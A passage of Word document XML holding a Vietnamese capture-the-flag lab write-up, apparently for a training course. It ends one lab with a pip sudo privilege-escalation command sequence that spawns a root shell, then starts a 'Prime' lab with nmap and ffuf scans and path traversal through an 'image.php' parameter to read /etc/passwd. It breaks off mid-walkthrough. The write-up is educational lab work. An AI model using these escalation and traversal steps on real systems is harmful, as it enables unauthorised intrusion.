      </w:r>
    </w:p>
    <w:p w14:paraId="5D95303F" w14:textId="115B0F8F" w:rsidR="002D630D" w:rsidRDefault="000B356F" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="000B356F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D70A595" wp14:editId="1D3C6814">
            <wp:extent cx="5731510" cy="19265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26590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5554CF3B" w14:textId="3046DAD7" w:rsidR="00DC1B20" w:rsidRDefault="001A6DA0" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Tạo một cổng nghe với port là 4444, khi chạy file thuộc user arsene, ta sẽ nhận được shell của user này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29462D78" w14:textId="1CBFD84B" w:rsidR="001A6DA0" w:rsidRDefault="007F5A76" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="007F5A76">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="348B8C05" wp14:editId="2ACF628E">
            <wp:extent cx="5731510" cy="6692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69290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D9869F" w14:textId="7FD3CBB4" w:rsidR="007F5A76" w:rsidRDefault="007F5A76" w:rsidP="00DA54FE">
      <w:r>
        <w:t xml:space="preserve">Tiếp tục </w:t>
      </w:r>
      <w:r w:rsidRPr="003A2454">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sudo -l</w:t>
      </w:r>
      <w:r w:rsidR="003A2454" w:rsidRPr="003A2454">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C3691">
        <w:t>user này có thể thực thi lệnh pip với quyền root mà không cần mật khẩu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F85FD45" w14:textId="4E9406E2" w:rsidR="001C3691" w:rsidRDefault="001C3691" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="001C3691">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66929A78" wp14:editId="0F29B867">
            <wp:extent cx="5731510" cy="14478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47800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD8E02C" w14:textId="039C464F" w:rsidR="001C3691" w:rsidRDefault="001C3691" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Với lệnh pip này, ta có thể leo thang lên root</w:t>
      </w:r>
      <w:r w:rsidR="003E4A88">
        <w:t xml:space="preserve"> bằng tập lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B708A3" w14:textId="77777777" w:rsidR="003E4A88" w:rsidRPr="003E4A88" w:rsidRDefault="003E4A88" w:rsidP="003E4A88">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E4A88">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>TF=$(mktemp -d)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCA13B6" w14:textId="541EF558" w:rsidR="003E4A88" w:rsidRPr="003E4A88" w:rsidRDefault="003E4A88" w:rsidP="003E4A88">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E4A88">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh &lt;$(tty) &gt;$(tty) 2&gt;$(tty)')" &gt; $TF/setup.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D41EFDC" w14:textId="1B8C85CB" w:rsidR="003E4A88" w:rsidRDefault="003E4A88" w:rsidP="003E4A88">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E4A88">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sudo pip install $TF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F5808E" w14:textId="39040C2C" w:rsidR="003E4A88" w:rsidRDefault="003E4A88" w:rsidP="003E4A88">
      <w:r>
        <w:t>Sau khi thành công ta có thể tìm thấy flag thứ 2 tại /root với nội dung như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B53C834" w14:textId="5272FC71" w:rsidR="003E4A88" w:rsidRDefault="00417465" w:rsidP="003E4A88">
      <w:r w:rsidRPr="00417465">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0021B547" wp14:editId="5259579A">
            <wp:extent cx="5731510" cy="57734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773420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B58DD" w14:textId="059CD9A6" w:rsidR="00417465" w:rsidRDefault="00417465" w:rsidP="003E4A88"/>
    <w:p w14:paraId="6D567418" w14:textId="7F5EEC80" w:rsidR="00417465" w:rsidRDefault="00417465" w:rsidP="00EB561B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lab: </w:t>
      </w:r>
      <w:r w:rsidR="009B372D">
        <w:t>Prime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24283712" w14:textId="5A210865" w:rsidR="00EB561B" w:rsidRDefault="003A2454" w:rsidP="00EB561B">
      <w:r>
        <w:t>Sử dụng netdiscover, ta biết được địa chỉ IP của máy là: 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="000E1519">
        <w:t>56.</w:t>
      </w:r>
      <w:r w:rsidR="007C033A">
        <w:t>143</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D8F0F5" w14:textId="5186BDE7" w:rsidR="003A2454" w:rsidRDefault="000E1519" w:rsidP="00EB561B">
      <w:r w:rsidRPr="000E1519">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28AEDC6C" wp14:editId="500322B0">
            <wp:extent cx="5731510" cy="15665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66545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39301D63" w14:textId="56FC7D9C" w:rsidR="000E1519" w:rsidRPr="000E1519" w:rsidRDefault="000E1519" w:rsidP="00EB561B">
      <w:r>
        <w:t xml:space="preserve">Thực hiện scan các cổng của server bằng </w:t>
      </w:r>
      <w:r w:rsidRPr="000E1519">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sudo nmap -sC -sV -p- -T4 192.168.56.</w:t>
      </w:r>
      <w:r w:rsidR="007C033A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>143</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1519">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D25D7F" w14:textId="1EEA9F69" w:rsidR="006D0F7A" w:rsidRDefault="00327AC9" w:rsidP="00EB561B">
      <w:r>
        <w:t>Ta nhận được 2 cổng TCP mở là 80 và 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4861EF02" w14:textId="7A50D711" w:rsidR="00327AC9" w:rsidRDefault="00327AC9" w:rsidP="00EB561B">
      <w:r w:rsidRPr="00327AC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66D67E26" wp14:editId="54214CE9">
            <wp:extent cx="5731510" cy="19894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89455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A579240" w14:textId="386554AB" w:rsidR="009E1489" w:rsidRDefault="009E1489" w:rsidP="00EB561B">
      <w:r>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="004B27F3">
        <w:t>Burp Suite để quét nhưng không phát hiện gì thêm, tiếp theo sử dụng ffuf thì</w:t>
      </w:r>
      <w:r w:rsidR="009642B7">
        <w:t xml:space="preserve"> phát hiện một số file và folder như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226DE7EF" w14:textId="3FDC59F3" w:rsidR="009642B7" w:rsidRDefault="009642B7" w:rsidP="005515A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0373839E" w14:textId="793B2930" w:rsidR="005515A0" w:rsidRDefault="005515A0" w:rsidP="005515A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="005515A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DA80002" wp14:editId="6DFF6F3E">
            <wp:extent cx="5731510" cy="28397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39720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6086B6" w14:textId="2D04DFDC" w:rsidR="009642B7" w:rsidRDefault="009642B7" w:rsidP="005515A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/image.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0CC960" w14:textId="0B1C0186" w:rsidR="005515A0" w:rsidRDefault="005515A0" w:rsidP="005515A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="005515A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C731F29" wp14:editId="45084EB5">
            <wp:extent cx="5731510" cy="285178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51785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6074897D" w14:textId="6AC03C69" w:rsidR="009642B7" w:rsidRDefault="009642B7" w:rsidP="005515A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA6CFF" w14:textId="537D89AE" w:rsidR="005515A0" w:rsidRDefault="005515A0" w:rsidP="005515A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="005515A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1217B859" wp14:editId="3307E388">
            <wp:extent cx="5456393" cy="17756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6393" cy="1775614"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAEBCB1" w14:textId="50B0B0E5" w:rsidR="009642B7" w:rsidRDefault="009642B7" w:rsidP="005515A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F2EE3" w14:textId="57BB64F4" w:rsidR="005515A0" w:rsidRDefault="005515A0" w:rsidP="005515A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="005515A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B1CD170" wp14:editId="2B9B85A3">
            <wp:extent cx="4816257" cy="227095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6257" cy="2270957"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D3435" w14:textId="4F2CB247" w:rsidR="009642B7" w:rsidRDefault="009642B7" w:rsidP="005515A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/secret.</w:t>
      </w:r>
      <w:r w:rsidR="00497061">
        <w:t>txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C03174" w14:textId="1E023BF1" w:rsidR="00497061" w:rsidRDefault="00497061" w:rsidP="00497061">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00497061">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12714710" wp14:editId="1EBFF287">
            <wp:extent cx="5288738" cy="2636748"/>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8738" cy="2636748"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C24844" w14:textId="771C1C79" w:rsidR="00E63F8F" w:rsidRDefault="00E63F8F" w:rsidP="00E63F8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/wordpres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00E63F8F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79FC082C" wp14:editId="0AD8BE7A">
            <wp:extent cx="5731510" cy="29565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56560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4140A" w14:textId="328D1913" w:rsidR="008F4396" w:rsidRDefault="00497061" w:rsidP="00497061">
      <w:r>
        <w:t xml:space="preserve">Theo như dữ liệu nhận được từ secret.txt, có lẽ 2 trang php ta </w:t>
      </w:r>
      <w:r w:rsidR="00C71D75">
        <w:t>nhận được có 1 param, tiếp tục sử dụng ffuf</w:t>
      </w:r>
      <w:r w:rsidR="008F4396">
        <w:t xml:space="preserve"> để quét 2 trang này</w:t>
      </w:r>
      <w:r w:rsidR="00214F81">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43820434" w14:textId="5DDFBFB0" w:rsidR="00497061" w:rsidRDefault="008F4396" w:rsidP="00497061">
      <w:r>
        <w:t xml:space="preserve">Với trang index.php: </w:t>
      </w:r>
      <w:r w:rsidR="00214F81" w:rsidRPr="008F4396">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ffuf -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://192.168.56.143/index.php?FUZZ=123 -e .txt,.html,.php -fs 136</w:t>
      </w:r>
      <w:r w:rsidR="00C71D75">
        <w:t>, ta nhận được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00634601" w14:textId="668145C5" w:rsidR="00C71D75" w:rsidRDefault="008F4396" w:rsidP="00497061">
      <w:r w:rsidRPr="008F4396">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="085E743B" wp14:editId="47B2D37F">
            <wp:extent cx="5731510" cy="266001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660015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="780ACFBC" w14:textId="7E0AF9B6" w:rsidR="009E1489" w:rsidRDefault="00EA2F22" w:rsidP="00EB561B">
      <w:r>
        <w:t>Quét thêm trang image.php nhưng hiện tại chưa tìm được param thích hợp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061AB81A" w14:textId="69074DFB" w:rsidR="00EA2F22" w:rsidRDefault="00816CBE" w:rsidP="00EB561B">
      <w:r>
        <w:t>Quét sâu thêm vào trang index.php với param là file</w:t>
      </w:r>
      <w:r w:rsidR="00D51377">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58478D65" w14:textId="5717BE6E" w:rsidR="00D51377" w:rsidRDefault="00D51377" w:rsidP="00EB561B">
      <w:r w:rsidRPr="00D51377">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46D6B1F7" wp14:editId="3B4B6969">
            <wp:extent cx="5731510" cy="19202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920240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F16145" w14:textId="43CA1F08" w:rsidR="00D51377" w:rsidRDefault="00D51377" w:rsidP="00EB561B">
      <w:r>
        <w:t>Có một file location.txt với nội dung như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C154E66" w14:textId="472322E3" w:rsidR="00D51377" w:rsidRDefault="00D51377" w:rsidP="00EB561B">
      <w:r w:rsidRPr="00D51377">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CDF0B10" wp14:editId="1C0D14F1">
            <wp:extent cx="5731510" cy="30537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53715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FE3F0D" w14:textId="48DF1493" w:rsidR="00035B88" w:rsidRDefault="00035B88" w:rsidP="00EB561B">
      <w:r>
        <w:t xml:space="preserve">Có lẽ như với trang image.php, param chúng ta cần là </w:t>
      </w:r>
      <w:r w:rsidRPr="00035B88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>secrettier360</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008C3D64">
        <w:t>đúng như vậy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31253128" w14:textId="4F4F6534" w:rsidR="008C3D64" w:rsidRDefault="008C3D64" w:rsidP="00EB561B">
      <w:r w:rsidRPr="008C3D64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FBA390F" wp14:editId="66EDE3F7">
            <wp:extent cx="5731510" cy="195707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957070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EA5A00" w14:textId="28A14767" w:rsidR="008C3D64" w:rsidRDefault="008C3D64" w:rsidP="00EB561B">
      <w:r>
        <w:t>Nhưng từ kết quả trả về, chỉ có /index.php, và /dev là hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3D1142" w14:textId="70BFE2E5" w:rsidR="008C3D64" w:rsidRDefault="008C3D64" w:rsidP="00EB561B">
      <w:r>
        <w:t xml:space="preserve">Trên địa chỉ: </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidRPr="00C25CE6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.143/image.php?secrettier360=index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> có đến 2 bức ảnh, 2 bức này đều thuộc </w:t>
      </w:r>
      <w:r w:rsidR="00210EB4">
        <w:t xml:space="preserve">địa chỉ </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidR="00210EB4" w:rsidRPr="00C25CE6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.143/index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00210EB4">
        <w:t xml:space="preserve"> mà ta đã thấy ban đầu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4846971E" w14:textId="0C7050DF" w:rsidR="008C3D64" w:rsidRDefault="008C3D64" w:rsidP="00EB561B">
      <w:r w:rsidRPr="008C3D64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4765BA0E" wp14:editId="5D32F4E9">
            <wp:extent cx="5731510" cy="34112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411220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB4138" w14:textId="21CF0A8F" w:rsidR="00210EB4" w:rsidRDefault="00210EB4" w:rsidP="00EB561B">
      <w:r>
        <w:t xml:space="preserve">Tương tự </w:t>
      </w:r>
      <w:r w:rsidR="00FF73A7">
        <w:t xml:space="preserve">với </w:t>
      </w:r>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidR="00FF73A7" w:rsidRPr="00C25CE6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.143/image.php?secrettier360=dev</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FF73A7">
        <w:t xml:space="preserve"> cũng từ địa chỉ </w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidR="00FF73A7" w:rsidRPr="00C25CE6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.143/dev</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FF73A7">
        <w:t xml:space="preserve"> ban đầu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E46C0A" w14:textId="1ED4E73E" w:rsidR="00FF73A7" w:rsidRDefault="00FF73A7" w:rsidP="00EB561B">
      <w:r w:rsidRPr="00FF73A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BAFAE80" wp14:editId="785BEB42">
            <wp:extent cx="5731510" cy="33420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342005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B80073" w14:textId="046B89BA" w:rsidR="00FF73A7" w:rsidRDefault="009146B7" w:rsidP="00EB561B">
      <w:r>
        <w:t>Ta thấy</w:t>
      </w:r>
      <w:r w:rsidR="00FF73A7">
        <w:t xml:space="preserve"> khi truy vấn thêm param này, trang sẽ trả về thêm nội dung</w:t>
      </w:r>
      <w:r w:rsidR="003D2796">
        <w:t xml:space="preserve"> của </w:t>
      </w:r>
      <w:r w:rsidR="00A400E2">
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r>
        <w:t>file thuộc máy chủ, cộng thêm ẩn ý của tác giả khi nhắc đến việc sử dụng ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00035B88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>secrettier360</w:t>
      </w:r>
      <w:r>
        <w:t>’ ‘for fun’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8F5859" w14:textId="52DB1CF1" w:rsidR="009146B7" w:rsidRDefault="009146B7" w:rsidP="00EB561B">
      <w:r>
        <w:t xml:space="preserve">Ta thử </w:t>
      </w:r>
      <w:r w:rsidR="00054E45">
        <w:t xml:space="preserve">tấn công đường dẫn </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidR="00054E45" w:rsidRPr="00C25CE6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.143/image.php?secrettier360=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00054E45">
        <w:t xml:space="preserve"> với </w:t>
      </w:r>
      <w:r w:rsidR="00F466A1">
        <w:t>Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF21B99" w14:textId="7DBAEB3D" w:rsidR="00F466A1" w:rsidRDefault="00F466A1" w:rsidP="00EB561B">
      <w:r w:rsidRPr="00F466A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A33FF4B" wp14:editId="321228FB">
            <wp:extent cx="5731510" cy="295021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950210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DF7CFF" w14:textId="25BEA070" w:rsidR="00F466A1" w:rsidRDefault="00C847A8" w:rsidP="00EB561B">
      <w:r>
        <w:t xml:space="preserve">Ta đã biết máy chủ có </w:t>
      </w:r>
      <w:r w:rsidR="003409B1">
        <w:t xml:space="preserve">user là victor, và có một file password.txt </w:t>
      </w:r>
      <w:r w:rsidR="00D215F8">
        <w:t>ở đâu đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1DA528" w14:textId="17F3FA37" w:rsidR="00D215F8" w:rsidRDefault="00D215F8" w:rsidP="00EB561B">
      <w:r>
        <w:t>Để ý kỹ file /etc/passwd thì có thể thấy nó nằm ở /home/saket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D2E1A8" w14:textId="3BDE5F04" w:rsidR="00D215F8" w:rsidRDefault="00D215F8" w:rsidP="00EB561B">
      <w:r w:rsidRPr="00D215F8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
